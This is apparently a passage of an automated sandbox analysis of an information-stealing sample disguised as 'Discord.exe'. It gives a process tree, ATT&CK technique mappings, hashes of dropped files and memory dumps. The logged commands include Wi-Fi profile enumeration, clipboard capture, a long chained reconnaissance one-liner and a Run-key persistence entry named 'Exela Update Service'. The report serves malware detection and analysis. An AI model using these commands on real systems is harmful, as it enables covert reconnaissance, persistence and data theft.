C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
4⤵
- Suspicious use of WriteProcessMemory
PID:2080

C:\Windows\system32\netsh.exe
netsh wlan show profiles
5⤵
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:4676

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:4064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:2344

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:3268

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1200

C:\Users\Admin\AppData\Local\Anon\Discord.exe
"C:\Users\Admin\AppData\Local\Anon\Discord.exe"
1⤵
- Executes dropped EXE
PID:4744

C:\Users\Admin\AppData\Local\Anon\Discord.exe
"C:\Users\Admin\AppData\Local\Anon\Discord.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:3268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:1204

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:3412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:3036

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:4728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f"
3⤵
PID:208

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe" /f
4⤵
- Adds Run key to start application
PID:1124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
3⤵
PID:4304

C:\Windows\system32\tasklist.exe
tasklist
4⤵
- Enumerates processes with tasklist
PID:2400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
3⤵
PID:3396

C:\Windows\system32\cmd.exe
cmd.exe /c chcp
4⤵
PID:1536

C:\Windows\system32\chcp.com
chcp
5⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
3⤵
PID:3500

C:\Windows\system32\cmd.exe
cmd.exe /c chcp
4⤵
PID:3532

C:\Windows\system32\chcp.com
chcp
5⤵
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
3⤵
PID:3528

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
4⤵
- Enumerates processes with tasklist
PID:5108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
3⤵
PID:3800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
3⤵
PID:2892

C:\Windows\system32\systeminfo.exe
systeminfo
4⤵
- Gathers system information
PID:4816

C:\Windows\system32\HOSTNAME.EXE
hostname
4⤵
PID:2000

C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
4⤵
- Collects information from the system
PID:3304

C:\Windows\system32\net.exe
net user
4⤵
PID:4728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
5⤵
PID:2920

C:\Windows\system32\query.exe
query user
4⤵
PID:3024

C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
5⤵
PID:2152

C:\Windows\system32\net.exe
net localgroup
4⤵
PID:1812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
5⤵
PID:2844

C:\Windows\system32\net.exe
net localgroup administrators
4⤵
PID:3992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
5⤵
PID:2964

C:\Windows\system32\net.exe
net user guest
4⤵
PID:1308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
5⤵
PID:4052

C:\Windows\system32\net.exe
net user administrator
4⤵
PID:888

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
5⤵
PID:4480

C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
4⤵
PID:3164

C:\Windows\system32\tasklist.exe
tasklist /svc
4⤵
- Enumerates processes with tasklist
PID:4348

C:\Windows\system32\ipconfig.exe
ipconfig /all
4⤵
- Gathers network information
PID:3364

C:\Windows\system32\ROUTE.EXE
route print
4⤵
PID:2848

C:\Windows\system32\ARP.EXE
arp -a
4⤵
PID:1472

C:\Windows\system32\NETSTAT.EXE
netstat -ano
4⤵
- Gathers network information
PID:3180

C:\Windows\system32\sc.exe
sc query type= service state= all
4⤵
- Launches sc.exe
PID:1468

C:\Windows\system32\netsh.exe
netsh firewall show state
4⤵
- Modifies Windows Firewall
PID:4336

C:\Windows\system32\netsh.exe
netsh firewall show config
4⤵
- Modifies Windows Firewall
PID:2800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
3⤵
PID:4896

C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:1644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:3396

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
3⤵
PID:4436

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
4⤵
PID:1880

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Anon\Discord.exe
Filesize
9.5MB

MD5
585f19dd0681b2aa15aa0146e132bd25

SHA1
5e4ee4ae843dd166b3867ae500b9c64b7cac90fe

SHA256
0b8d6657896b0ef9abf07c760cbe2bfcc26d24cb1f0b9540f8fb267e98399922

SHA512
5e8ffc0a5e4085d59f4f829129fc7b5301bd869fcf293072422b1906f96576fba90f1a9fae31f785bfbd00b96c3ef0185a7dd90b4f292828f0ac6d5ef1fb3a9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\HistoryData.db
Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\HistoryData.db
Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Temp\Web.db
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Web.db
Filesize
100KB

MD5
fe7f1430f6bbc149ff1e211f28c9674a

SHA1
fb9fbfec9e80acd8088200b402c9d60bd27140b2

SHA256
41b860622a64fc22804e22a9519100d437397b1c1da5255906ee2234cdbe7ce8

SHA512
d52b68ba3df1bb5611b9ab39a03f988089ffb810d08da4abbdf795681ccd2c15c1590c797c623f3a93bc4c92e6181c3982fa464e62d4614d00bb8261f22a12c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\VCRUNTIME140.dll
Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_asyncio.pyd
Filesize
34KB

MD5
6de61484aaeedf539f73e361eb186e21

SHA1
07a6ae85f68ca9b7ca147bf587b4af547c28e986

SHA256
2c308a887aa14b64f7853730cb53145856bacf40a1b421c0b06ec41e9a8052ff

SHA512
f9c4a6e8d4c5cb3a1947af234b6e3f08c325a97b14adc371f82430ec787cad17052d6f879575fc574abb92fd122a3a6a14004dce80b36e6e066c6bc43607463d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_bz2.pyd
Filesize
46KB

MD5
d584d4cfc04f616d406ec196997e706c

SHA1
b7fe2283e5b882823ee0ffcf92c4dd05f195dc4c

SHA256
e1ea9bb42b4184bf3ec29cbe10a6d6370a213d7a40aa6d849129b0d8ec50fda4

SHA512
ccf7cfbf4584401bab8c8e7d221308ca438779849a2eea074758be7d7afe9b73880e80f8f0b15e4dc2e8ae1142d389fee386dc58b603853760b0e7713a3d0b9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_cffi_backend.cp310-win_amd64.pyd
Filesize
71KB

MD5
0d43a42cb44ecb9785ccc090a3de3d8f

SHA1
2f77cfa195cfe024d42e2ed287e2194685ec5d7d

SHA256
fdaa50a83947ec292e1773043f077cddfefbb52e53d5575b175eab5987de3242

SHA512
5968654a976699b4653d44912b34fc67a59d821d9e45f271d7d94b18b1a255c265f9e85460b570be04983b15268547a451e5385064616ab750b825b156c4643e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ctypes.pyd
Filesize
56KB

MD5
f0077496f3bb6ea93da1d7b5ea1511c2

SHA1
a901ad6e13c1568d023c0dcb2b7d995c68ed2f6a

SHA256
0269ae71e9a7b006aab0802e72987fc308a6f94921d1c9b83c52c636e45035a0

SHA512
4f188746a77ad1c92cefa615278d321912c325a800aa67abb006821a6bdffc145c204c9da6b11474f44faf23376ff7391b94f4a51e6949a1d2576d79db7f27ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_hashlib.pyd
Filesize
33KB

MD5
0d8ffe48eb5657e5ac6725c7be1d9aa3

SHA1
a39a3dc76f3c7a4b8645bb6c1dc34e50d7e9a287

SHA256
5ad4b3a6287b9d139063383e2bfdc46f51f6f3aaca015b59f9ed58f707fa2a44

SHA512
c26c277196395291a4a42e710af3560e168535e59b708b04343b4a0a926277a93e16fe24673903469b7c96545d6fbf036f149ef21231a759a13147d533d4fc3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_lzma.pyd
Filesize
84KB

MD5
213a986429a24c61eca7efed8611b28a

SHA1
348f47528a4e8d0a54eb60110db78a6b1543795e

SHA256
457114386ce08d81cb7ac988b1ff60d2fdffc40b3de6d023034b203582d32f5d

SHA512
1e43c2cacc819a2e578437d1329fa1f772fe614167d3ec9b5612b44f216175500e56e3d60a7107b66a5b3121e9e2e49344ebe9ff1b752cae574bb8b60eec42ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_overlapped.pyd
Filesize
30KB

MD5
b05bce7e8a1ef69679da7d1b4894208f

SHA1
7b2dd612cf76da09d5bd1a9dcd6ba20051d11595

SHA256
9c8edf15e9f0edbc96e3310572a231cdd1c57c693fbfc69278fbbc7c2fc47197

SHA512
27cef9b35a4560c98b4d72e5144a68d068263506ac97f5f813b0f6c7552f4c206c6f9a239bc1d9161aff79742cd4516c86f5997c27b1bd084e03854d6410b8e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_socket.pyd
Filesize
41KB

MD5
02adf34fc4cf0cbb7da84948c6e0a6ce

SHA1
4d5d1adaf743b6bd324642e28d78331059e3342b

SHA256
e92b5042b4a1ca76b84d3070e4adddf100ba5a56cf8e7fcd4dd1483830d786a5

SHA512
da133fc0f9fefed3b483ba782948fcdc508c50ffc141e5e1e29a7ec2628622cdd606c0b0a949098b48ee3f54cdb604842e3ca268c27bc23f169fced3d2fbd0a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_sqlite3.pyd
Filesize
48KB

MD5
b2b86c10944a124a00a6bcfaf6ddb689

SHA1
4971148b2a8d07b74aa616e2dd618aaf2be9e0db

SHA256
874783af90902a7a8f5b90b018b749de7ddb8ec8412c46f7abe2edfe9c7abe84

SHA512
0a44b508d2a9700db84bd395ff55a6fc3d593d2069f04a56b135ba41fc23ea7726ae131056123d06526c14284bce2dbadd4abf992b3eb27bf9af1e083763556f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_ssl.pyd
Filesize
60KB

MD5
1af0fbf618468685c9a9541be14b3d24

SHA1
27e8c76192555a912e402635765df2556c1c2b88

SHA256
a46968ca76d6b17f63672a760f33664c3ea27d9356295122069e23d1c90f296a

SHA512
7382a0d3ec2ce560efd2ddd43db8423637af341ce6889d335165b7876b15d08f4de0f228f959dcb90b47814f9f4e0edd02d38a78ddad152ed7bc86791d46bc36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\_uuid.pyd
Filesize
21KB

MD5
00276ab62a35d7c6022ae787168fe275

SHA1
e34d9a060b8f2f8673f878e64d7369ab99869876

SHA256
3500db7ef67cddd8b969f87b4a76a577b5b326597da968e262c23d2a8c7b426a

SHA512
ea4a46b0f7295b61a268d8df0e2f722b86b596946c421d5d89fe734389a819c9ae8e94b99e554feb4e40497261fa9c3ae7d13fdba1f4ad4f22c650076150682a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_helpers.cp310-win_amd64.pyd
Filesize
26KB

MD5
24b04e53107114e2dc13f44774e31832

SHA1
01d1d62f47f0d18795c2ccf7ea660a9d20a760e2

SHA256
aaebb74eee86318e3e40b13ae29b0cd2fb53a7b5963dc8ad47a5acf6b3ea9bf4

SHA512
7fec582436b54148459dac4565b801a227831b04bb3f2da1fad6cfa340882009df82327c7992fa40e72635fc472bbc4d936c9c91935edeb0ca1dc13b3c3de2c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_parser.cp310-win_amd64.pyd
Filesize
80KB

MD5
fa4f8f1f441d4484676434f3259d2636

SHA1
3cc48b6fd3a9e095ad260db1e0b63089d2790974

SHA256
30107fa8ac62ae46dd41b60f7aff883cfff7e61c225986bf942a332738b915fa

SHA512
aefd22279ebc75d1b9c8af9176e69a935ba6257680fa4ad0c4662a83470b1e201a42e20776cc0bcb9e6981b7861d6805b1d2154237b42b759fcd0df3707c8e34

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_http_writer.cp310-win_amd64.pyd
Filesize
24KB

MD5
50dea505ca281aa212ed274c4a6c8dee

SHA1
9c00ebb80f75016122f0e17d16b4e328930c97f2

SHA256
cf37a3202197a4a51ad604ad054ca056daa23e86d8b4d731aeba76128bd463f2

SHA512
0ff2345a05c8333eda7f68017ca0fb9979ebf2d73575bb9fe17979e86ce226d43bc8942ff5f217cd48afebec782963483c7c00e8de9ad70c377f026a1606afc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\aiohttp\_websocket.cp310-win_amd64.pyd
Filesize
19KB

MD5
d568b417c5f56eda3d369c1ec727cbed

SHA1
eea5b25c417c87913ce0cd7a2d78e80ea658115c

SHA256
6dfa4510da740660fc4f70a79a83b817e55cdb31dd8a393fe78db223ea7b20f3

SHA512
d1749d01a2d64dc1a3182af9b840f4ddadb8f587c403f8a99963fa5a23621f695dc19f6531e1c182219e28d89e4e2f8f55e7b4b9f1f90d673c45302871cbd4df

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\base_library.zip
Filesize
812KB

MD5
524a85217dc9edc8c9efc73159ca955d

SHA1
a4238cbde50443262d00a843ffe814435fb0f4e2

SHA256
808549964adb09afafb410cdc030df4813c5c2a7276a94e7f116103af5de7621

SHA512
f5a929b35a63f073bdc7600155ba2f0f262e6f60cf67efb38fa44e8b3be085cf1d5741d66d25a1ecaaf3f94abfe9bbe97d135f8a47c11f2b811d2aac6876f46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\cryptography\hazmat\bindings\_rust.pyd
Filesize
2.0MB

MD5
29029cacb83854cc386584efd26b4ecf

SHA1
2e7b1bdb625184f1a814ad7c5b8b6a817c1a84cf

SHA256
b3906df5b31bf7f0604df4a449a67bd9aea37701e0c2d78a78ac0935a55c37e9

SHA512
fecd5368a51004685e78edc54d254e49c9361c588a0f2d4ea1de5971584d48d161fa88d46de22fabba7f6aef6c8b5d0fbcd2526a426d100c3a4d8933ed97e05d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\frozenlist\_frozenlist.cp310-win_amd64.pyd
Filesize
36KB

MD5
703c3909c2a463ae1a766e10c45c9e5a

SHA1
37a1db87e074e9cd9191b1b8d8cc60894adeaf73

SHA256
e7f39b40ba621edfd0dceda41ccdead7c8e96dd1fa34035186db41d26ddee803

SHA512
1c46832b1b7645e3720da6cca170516a38b9fe6a10657e3f5a905166b770c611416c563683ce540b33bc36d37c4a594231e0757458091e3ae9968da2ff029515

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libcrypto-1_1.dll
Filesize
1.1MB

MD5
9c2ffedb0ae90b3985e5cdbedd3363e9

SHA1
a475fbe289a716e1fbe2eab97f76dbba1da322a9

SHA256
7c9418ad6fb6d15acb7d340b7a6533f76337ad302a18e2b4e08d4ee37689913a

SHA512
70d2635d42e24c7426cf5306ed010808f2222049915adb43ffc12c13259c8e7a9fee3a49e096d5ba2b6b733fef18574823d00df2e8d7fb1532e1d65d0c478008

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libffi-7.dll
Filesize
23KB

MD5
8e1d2a11b94e84eaa382d6a680d93f17

SHA1
07750d78022d387292525a7d8385687229795cf1

SHA256
090a90cd17b74abefddf9f82d145effe5c676e7c62cf1a59834528f512d7ee82

SHA512
213bf92a707b14211941e5e071f1926be4b5795babc6df0d168b623ecd6cb7c7e0ae4320369c51d75c75b38ec282b5bf77f15eb94018ae74c8fd14f328b45a4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\libssl-1_1.dll
Filesize
203KB

MD5
87bb1a8526b475445b2d7fd298c57587

SHA1
aaad18ea92b132ca74942fd5a9f4c901d02d9b09

SHA256
c35a97d8f24ea84d1e39a8621b6b3027c9ac24885bdd37386c9fcaad1858419d

SHA512
956bd8e9f35c917cbfb570fc633bb2df0d1c2686731fa7179f5e7cd8789e665dd6ff8443e712eafa4e3f8d8661f933cb5675aeb1a2efc195c3bb32211e6d2506

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\multidict\_multidict.cp310-win_amd64.pyd
Filesize
20KB

MD5
d282e94282a608185de94e591889e067

SHA1
7d510c2c89c9bd5546cee8475e801df555e620bc

SHA256
84726536b40ff136c6d739d290d7660cd9514e787ab8cefbcbb7c3a8712b69aa

SHA512
e413f7d88dd896d387af5c3cfe3943ba794925c70ffb5f523a200c890bf9ceb6e4da74abe0b1b07d5e7818628cd9bc1f45ebc4e9d1e4316dd4ae27ea5f5450d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\python3.DLL
Filesize
63KB

MD5
c17b7a4b853827f538576f4c3521c653

SHA1
6115047d02fbbad4ff32afb4ebd439f5d529485a

SHA256
d21e60f3dfbf2bab0cc8a06656721fa3347f026df10297674fc635ebf9559a68

SHA512
8e08e702d69df6840781d174c4565e14a28022b40f650fda88d60172be2d4ffd96a3e9426d20718c54072ca0da27e0455cc0394c098b75e062a27559234a3df7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\python310.dll
Filesize
1.4MB

MD5
196deb9a74e6e9e242f04008ea80f7d3

SHA1
a54373ebad306f3e6f585bcdf1544fbdcf9c0386

SHA256
20b004bfe69166c4961fee93163e795746df39fb31dc67399c0fde57f551eb75

SHA512
8c226d3ef21f3ddeee14a098c60ef030fa78590e9505d015ce63ea5e5bbcea2e105ff818e94653df1bddc9ba6ed3b376a1dff5c19266b623fa22cd75ac263b68

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\select.pyd
Filesize
24KB

MD5
16be2c5990fe8df5a6d98b0ba173084d

SHA1
572cb2107ff287928501dc8f5ae4a748e911d82d

SHA256
65de0eb0f1aa5830a99d46a1b2260aaa0608ed28e33a4b0ffe43fd891f426f76

SHA512
afa991c407548da16150ad6792a5233688cc042585538d510ac99c2cb1a6ee2144f31aa639065da4c2670f54f947947860a90ec1bde7c2afaa250e758b956dbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\sqlite3.dll
Filesize
608KB

MD5
4357c9ab90f329f6cbc8fe6bc44a8a97

SHA1
2ec6992da815dcdb9a009d41d7f2879ea8f8b3f3

SHA256
eb1b1679d90d6114303f490de14931957cdfddf7d4311b3e5bacac4e4dc590ba

SHA512
a245971a4e3f73a6298c949052457fbaece970678362e2e5bf8bd6e2446d18d157ad3f1d934dae4e375ab595c84206381388fb6de6b17b9df9f315042234343a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\unicodedata.pyd
Filesize
287KB

MD5
d296d76daf56777da51fec9506d07c6a

SHA1
c012b7d74e68b126a5c20ac4f8408cebacbbf98d

SHA256
05201ceb3dba9395f6ac15a069d94720b9c2b5c6199447105e9bc29d7994c838

SHA512
15eed0ab1989e01b57e10f886a69a0cca2fff0a37cc886f4e3bc5c08684536cb61ff2551d75c62137c97aa455d6f2b99aab7ae339ea98870bb4116f63508deb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI50122\yarl\_quoting_c.cp310-win_amd64.pyd
Filesize
40KB

MD5
50dee02b7fe56be5b7ae5bd09faa41ef

SHA1
69123e3aabd7070a551e44336f9ed83d96d333f8

SHA256
91067e48b7dff282a92995afaffff637f8a3b1164d05a25aea0393d5366c6b52

SHA512
7a67c23513a695b2fc527df264564ee08d29d98f0d99ff0700d1c54fbca0c519fa224fc2b5ff696cf016da9001e41842d35afb4fb4c06acf9e9aff08ca2d7dd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dmz51mey.uf2.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\x.bat
Filesize
1KB

MD5
87c76e1dd7b33679b6426b9e93321add

SHA1
2f4916fdfb1839c36d7d7faab5dcda7e2ecb7e1d

SHA256
a945b78e97472684d8a8203a0b80e153689e029905fbded3bd94379fb9d02957

SHA512
aeea14441d1db88a10450d0f97b522140d181a95f01ae84aea0b35c170ba7b2cdcd166b59ab049ee919346bd7ab1d3c1c5388e5511425d94a0b4649af426397c

Download Submit
memory/2740-173-0x00007FFBF3E60000-0x00007FFBF42CE000-memory.dmp

Filesize
4.4MB

Download
memory/2740-245-0x00007FFC02C80000-0x00007FFC02CA4000-memory.dmp

Filesize
144KB

Download
memory/2740-108-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmp

Filesize
100KB

Download
memory/2740-109-0x00007FFC032B0000-0x00007FFC032BD000-memory.dmp

Filesize
52KB

Download
memory/2740-125-0x00007FFC02BE0000-0x00007FFC02C0E000-memory.dmp

Filesize
184KB

Download
memory/2740-131-0x00007FFBF2A40000-0x00007FFBF2DB5000-memory.dmp

Filesize
3.5MB

Download
memory/2740-132-0x0000021668310000-0x0000021668685000-memory.dmp

Filesize
3.5MB

Download
memory/2740-130-0x00007FFBF4EE0000-0x00007FFBF4F98000-memory.dmp

Filesize
736KB

Download
memory/2740-118-0x00007FFC02C60000-0x00007FFC02C79000-memory.dmp

Filesize
100KB

Download
memory/2740-119-0x00007FFC02C30000-0x00007FFC02C5D000-memory.dmp

Filesize
180KB

Download
memory/2740-120-0x00007FFC02C10000-0x00007FFC02C2F000-memory.dmp

Filesize
124KB

Download
memory/2740-121-0x00007FFBF3CE0000-0x00007FFBF3E51000-memory.dmp

Filesize
1.4MB

Download
memory/2740-104-0x00007FFC0BC80000-0x00007FFC0BC8F000-memory.dmp

Filesize
60KB

Download
memory/2740-93-0x00007FFBF3E60000-0x00007FFBF42CE000-memory.dmp

Filesize
4.4MB

Download
memory/2740-150-0x00007FFC02A10000-0x00007FFC02A32000-memory.dmp

Filesize
136KB

Download
memory/2740-356-0x00007FFC02C80000-0x00007FFC02CA4000-memory.dmp

Filesize
144KB

Download
memory/2740-357-0x00007FFC0BC80000-0x00007FFC0BC8F000-memory.dmp

Filesize
60KB

Download
memory/2740-358-0x00007FFC035E0000-0x00007FFC035F9000-memory.dmp

Filesize
100KB

Download
memory/2740-359-0x00007FFC032B0000-0x00007FFC032BD000-memory.dmp

Filesize
52KB

Download
memory/2740-168-0x00007FFC028E0000-0x00007FFC028F7000-memory.dmp

Filesize
92KB

Download
memory/2740-167-0x00007FFC00540000-0x00007FFC0055E000-memory.dmp

Filesize
120KB

Download
memory/2740-166-0x00007FFC02B90000-0x00007FFC02B9A000-memory.dmp

Filesize
40KB

Download
memory/2740-165-0x00007FFC00750000-0x00007FFC00761000-memory.dmp

Filesize
68KB

Download
memory/2740-164-0x00007FFBF4E90000-0x00007FFBF4EDC000-memory.dmp

Filesize
304KB

Download
memory/2740-163-0x00007FFC008D0000-0x00007FFC008E9000-memory.dmp

Filesize
100KB

Download
memory/2740-360-0x00007FFC02C60000-0x00007FFC02C79000-memory.dmp

Filesize
100KB

Download
memory/2740-361-0x00007FFC02C30000-0x00007FFC02C5D000-memory.dmp

Filesize
180KB

Download
memory/2740-149-0x00007FFBF3BC0000-0x00007FFBF3CD8000-memory.dmp

Filesize
1.1MB

Download
